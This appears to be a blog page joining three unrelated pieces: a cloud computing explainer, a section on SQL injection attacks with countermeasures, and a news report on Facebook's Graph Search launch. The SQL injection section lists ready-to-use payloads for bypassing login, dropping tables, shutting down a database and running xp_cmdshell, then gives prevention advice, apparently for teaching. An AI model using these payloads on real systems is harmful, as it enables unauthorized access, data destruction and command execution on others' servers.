CLOUD COMPUTING!!!

If you pick up any tech magazine or visit in IT related websites/blogs, I'm sure you'll see a talk about cloud computing. But the only only problem with the cloud computing is not everyone agrees on what it is. If you ask ten different IT professionals what cloud computing is, you'll surely get ten different answers! Typical answers you get are

• widely distributed
• network based
• storage
• computation
• utility computing
• HaaS
• PaaS
• Saas

Some customer oriented definitions

• Anytime
• anywhere
• with any device
• accessing any services

When you store your photos online instead of on your home computer, or use webmail or a social networking site, you are actually using the "cloud" service. If you are an organization, and you want to use, for example, an online invoicing instead of updating the in-house one you have been using for many years, that online invoicing service is a "cloud computing" service.
Cloud computing refers to the delivery of computing resources over the internet. Instead of keeping data on your own hard drive or updating applications for your needs, at another location, to store your information or use its applications. Doing so may give rise to certain privacy implications. Cloud services allow individuals and businesses to use software and hardware that are managed by third parties at remote locations. Examples of cloud services include online file storage, social networking sites, email, and online business applications. The cloud computing model allows access to information and computer resources from anywhere that a network connection is available. Cloud computer provides a shared pool of resources, including data storage space, networks, computer processing power, and specialized corporate and user applications.

Key Characteristics:

• Universal access
• Scalable services
• Infrastructure managing the scaling, not applications.
• Elasticity: Expenses only incurred when they are needed.
• New Application Service Models
• XaaS = X as a Service
• Pay-as-you-go

SQL Injection attacks and Countermeasures

(for educational purpose only)

Most modern web applications rely on dynamic content to achieve the appeal of traditional desktop windowing programs. This dynamism is typically achieved by retrieving updated data from a database. One of the more popular platforms for web datastores is SQL, and many web applications are based entirely on front-end scripts that simply query a SQL database, either on the web server itself or a separate back-end system. One of the most insidious attacks on a web application involves hijacking the queries used by the front-end scripts themselves to attain control of the application or its data. One of the most efficient mechanisms for achieving this is a technique called SQL injection.

SQL injection refers to inputting raw Transact SQL queries into an application to perform an unexpected action. Often, existing queries are simply edited to achieve the same results—Transact SQL is easily manipulated by the placement of even a single character in a judiciously chosen spot, causing the entire query to behave in quite malicious ways. Some of the characters commonly used for such input validation attacks include the backtick (`), the double dash(--) and the semicolon (;), all of which have special meaning in Transact SQL.

What sorts of things can crafty hacker do with a usurped SQL query? Well, for starters, they could potentially access unauthorized data. With even sneakier techniques, they can bypass authentication or even gain complete control over the web server or back-end SQL system.

Example of SQL Injections

To see whether the application is vulnerable to SQL injections, type any of the following in the form fields.

Bypassing Authentication

To authenticate without any credentials:

Username: ‘OR”=’

Password: ‘OR”=’

To authenticate with just the username:

Username: admin’--

To authenticate as the first user in the “users” table:

Username: ‘ or 1=1--

To authenticate as a fictional user:

Username: ‘union select 1,’users’,’passwd’1--

Causing Destruction

To drop a dbase table:

Username: ‘;drop table users--

To shut down the dbase remotely:

Username: aaaaaaaaaaaaaaa’

Password: ‘;shutdown--

Executing Function Calls and Stored Procedures

Executing xp_cmdshell to get a directory listing:

http://localhost/script?0’;EXEC+master..xp_cmdshell+’dir’;--

Executing xp_servicecontrol to manipulate services:

http://localhost/script?0’;EXEC+master..xp_servicecontrol+’start’,’server’;--

Not all the syntax shown here works on every proprietary dbase implementation. The following information indicates whether some of the techniques outlined above will work on certain dbase platforms:

Database-Specific Information:

	MySQL	Oracle	DB2	Postgre	MS SQL
UNION possible	Y	Y	Y	Y	Y
Subselects possible	N	Y	Y	Y	Y
Multiple statements	N(mostly)	N	N	Y	Y
Default stored procedures	-	Many(utf_file)	-	-	Many(xp_cmdshell)
Other comments	Supports “INTO OUTFILE”	-	-	-	-

SQL Injection Countermeasures:

Here is an extensive but not complete list of methods used to prevent SQL injection:

·         Perform string input validation on any input from the client. Follow the common programming mantra of “constrain, reject and sanitize” – that is, constrain your input where possible (for example, only allow numeric formats for a ZIP code field), reject input that doesn’t fit the pattern, and sanitize where constraint is not practical. When sanitizing, consider validating data type, length, range and format correctness. See the Regular Expression Library at http://www.regexlib.com for a great sample of regular expressions for validating inputs.

·         Replace direct SQL statements with stored procedures, prepared statements, or ADO command objects. If you can’t use stored procs, use parameterized queries.

·         Implement default error handling. This would include using a general error message for all errors.

·         Lock down ODBC. Disable messaging to clients. Don’t let regular SQL statements through. This ensures that no client, not just the web application, can execute arbitrary SQL.

·         Lock down the dbase server configuration. Specify users, roles and permissions. Implement triggers at the RDBMS layer. This way, even if someone can get to the dbase and get arbitrary SQL statements to run, they won’t be able to do anything they’re not supposed to.

Facebook Graph Search

Mark Zuckerberg introduces Facebook's new friends-based search engine at the company's headquarters in California. Link to video: Mark Zuckerberg on Facebook's new search engine
Facebook has unveiled a new feature to allow users to sift through pictures, posts and messages in a way that the company's founder and chief executive, Mark Zuckerberg, claimed could transform how people use the social network.
Unveiling the tool, Graph Search, at its first major product launch since the company's IPO last May, Zuckerberg described it as the site's "third pillar", after Timeline and News Feed.
"Graph Search is a completely new way for people to get information on Facebook," he told a packed press conference at the company's headquarters in Menlo Park on Tuesday.
The function will initially let users search four categories – people, places, photos, interests – and gradually expand to cover all content, Zuckerberg said.
"Graph Search is a really big project. Eventually... we want to index all the posts and all of the content on Facebook. I thought it couldn't be done. This is just some really neat stuff. This is one of the coolest things we've done in a while."
A limited rollout began immediately, with Zuckerberg stressing that Graph Search is a "beta" product which will expand slowly and be built on over the coming years, evolving in response to how people used it.
"Graph Search is designed to take a precise query and return to you the answer," he said, "not links to other places that might take you to the answer."
Lars Rasmussen, a former Google executive who is now one of Facebook's top engineers, cited as an example a search for a spicy meal in San Francisco. A search for "restaurants liked by my friends from India" revealed a long list. Narrowing that to "Indian restaurants liked by my friends from India" yielded another list. Then he searched for restaurants in San Francisco liked by Culinary Institute of America graduates.
In cases where Graph Search comes up blank – which is likely to be a frequent occurrence in its infancy – the service defaults to the web search engine Bing, which is run by Google's rival Microsoft.
Industry analysts have long waited for Facebook to develop new ways to tap its lucrative mountains of data. Its stock rose last week, in anticipation that the announcement would involve a search engine. Zuckerberg said talks with Google over a possible collaboration had broken down over Facebook's insistence on greater privacy protection. He said the new service would not reveal additional information but instead collate and organise in new ways information to which users already had access.
He and fellow executives showed, however, how users could find a wealth of previously overlooked photos and posts and "likes".
"I want to invite friends over for Game of Thrones," he said, "but who among my friends likes Games of Thrones? Graph Search tells me."
Graph Search also enables the user to search, for instance, for "photos of my friends taken in national parks" or "photos of my friends taken before 1990". The latter revealed a gallery of Facebook employees as babies, prompting guffaws from assembled staff.
Tom Stocky, another Google import, showed what appeared to be a market researchers' dream tool: the new feature allows users to ask, for instance, what TV shows are most liked by doctors (Grey's Anatomy, House, The Doctors), or software engineers (Big Bang Theory).
A search for music liked by those who like Mitt Romney revealed Johnny Cash. Obama-likers liked Michael Jackson.
The tool could help Facebook wean users away from Google, Linked-in and dating sites, but Zuckerberg said the priority for now was improving existing customers' experience, with business applications to be considered later. There is no timetable for when Graph Search will be available on mobile.
"This is a really big project," Zuckerberg said. "It will take years and years to map the whole index of the graph."
His downplaying of immediate revenue sources dented markets' exuberance: shares dippled 1.5% to $30.46 immediately following the announcement.
Brian Blau, who tracks social media for the tech research firm Gartner,said the service offered a brand new way for users to experience Facebook. Confined to Facebook's eco-system, the service was not an immediate threat to Google but would gradually increase in importance, he said. "In the future, you know Facebook will figure out how to monetize this. It's going to change the way people think about search."
The respected news site TechCrunch gave Graph Search a thumbs-upand said investors who considered the announcement an anti-climax – prompting a dip in Facebook's share price – had missed the point.
"What's interesting is that Facebook does not shy away from introducing radical changes to its products," the site said. "As always, it focuses on what's best for the user and will stand behind an innovation if it believes that it will improve the user experience."
Investors, in contrast, liked conservative choices, security and stability, said TechCrunch. "That's why they should adapt to Facebook's way of doing things if they want to understand the company's long-term perspective, because Graph Search is clearly an important move for Facebook."

You can join the waiting list at https://www.facebook.com/about/graphsearch